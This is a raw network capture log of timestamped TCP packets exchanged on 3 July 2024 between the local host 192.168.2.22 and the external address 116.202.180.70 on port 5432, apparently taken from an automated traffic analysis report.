                                                              Jul 3, 2024 02:22:31.750211000 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.750222921 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.750241995 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.752072096 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764112949 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764139891 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764149904 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764152050 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764159918 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764164925 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764168978 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764177084 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764184952 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764192104 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764194965 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764204025 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764204979 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764214993 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764220953 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764224052 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764236927 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764252901 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764260054 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764261007 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764271021 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764280081 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764290094 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.764301062 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764308929 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.764319897 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773158073 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773169041 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773178101 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773206949 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773216963 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773225069 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773236036 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773246050 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773262024 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773262024 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773272038 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773276091 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773304939 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773382902 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773394108 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773405075 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773420095 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773420095 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773428917 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773432016 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773441076 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.773449898 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773462057 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.773471117 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.780462027 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780509949 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.780514956 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780525923 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780550003 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.780560970 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.780582905 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780592918 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780603886 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780613899 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.780625105 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.780641079 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.791913033 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.791923046 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.791929007 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.791980982 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792033911 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792052031 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792061090 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792078972 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792090893 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792155027 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792165041 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792176008 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792185068 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792187929 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792195082 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792198896 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792215109 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792226076 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792268038 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792279005 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792289972 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792299032 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792305946 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792308092 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792319059 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792331934 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792337894 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792340994 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792347908 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792356968 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792371988 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792372942 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792380095 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792385101 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792393923 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792395115 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792403936 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792403936 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792417049 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792429924 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792457104 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792552948 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792562008 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792568922 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792593002 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792601109 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792623043 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792634010 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792646885 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.792658091 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.792675972 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.806896925 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.806950092 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.806951046 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.806962967 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.806978941 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.806988001 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.806992054 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.806997061 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.807003021 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.807012081 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.807014942 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.807024956 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.807025909 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.807034969 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.807051897 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825043917 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825097084 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825107098 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825119972 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825128078 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825128078 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825134993 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825139999 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825150013 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825162888 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825165033 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825175047 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825177908 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825184107 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825193882 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825203896 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825208902 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825241089 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825258017 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825268030 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825277090 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825285912 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825306892 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825313091 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825314045 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825323105 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825331926 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825346947 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825356007 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825357914 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825367928 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825392962 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825428009 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825460911 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825521946 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825539112 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825547934 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825563908 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825573921 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825577974 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825582981 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825592995 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825603008 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825608015 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825618029 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825619936 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825627089 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825629950 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825653076 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825659037 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825687885 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825695992 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.825704098 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.825736046 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.840807915 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840816975 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840826035 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840868950 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.840945959 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840955973 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840965986 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840976000 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840981007 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.840986013 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.840993881 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.840996027 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841006041 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841007948 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841016054 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841022968 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841027021 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841029882 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841036081 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841047049 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841047049 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841056108 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.841058969 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841073036 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841088057 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.841705084 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854732990 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854782104 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854789972 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854801893 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854803085 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854810953 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854816914 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854826927 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854826927 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854835987 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854845047 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854854107 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854856968 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854857922 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854871035 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854871035 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854882956 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854885101 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854892969 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854902983 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854908943 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854908943 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854918003 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854922056 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854928017 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.854933977 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854948044 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854955912 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.854976892 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.863831043 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863882065 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863882065 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.863892078 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863914967 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.863924980 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.863969088 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863979101 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863990068 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.863998890 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864017010 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864026070 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864037991 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864047050 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864057064 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864067078 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864077091 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864078045 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864084959 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864092112 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864094973 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864105940 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864119053 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864125967 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.864192009 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.864228010 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.871225119 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871273041 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.871352911 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871361971 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871371984 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871381998 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871392012 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871401072 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871402025 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.871411085 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.871411085 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.871426105 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.871439934 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.882833958 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.882879972 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.882882118 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.882889986 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.882914066 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.882975101 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.882986069 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.882996082 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883012056 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883021116 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883023977 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883028030 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883033991 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883042097 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883044004 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883054972 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883069038 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883070946 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883080959 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883090019 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883100033 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883107901 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883110046 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883119106 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883121967 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883132935 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883133888 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883147001 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883162975 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883330107 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883341074 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883351088 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883363962 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883373976 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883383036 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883393049 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883397102 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883405924 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883414984 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883433104 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883435011 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883443117 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883443117 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883454084 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883465052 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.883467913 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883481979 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883492947 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.883630991 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.897763014 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.897802114 CEST543249169116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:31.897839069 CEST491695432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:31.897864103 CEST543249169116.202.180.70192.168.2.22
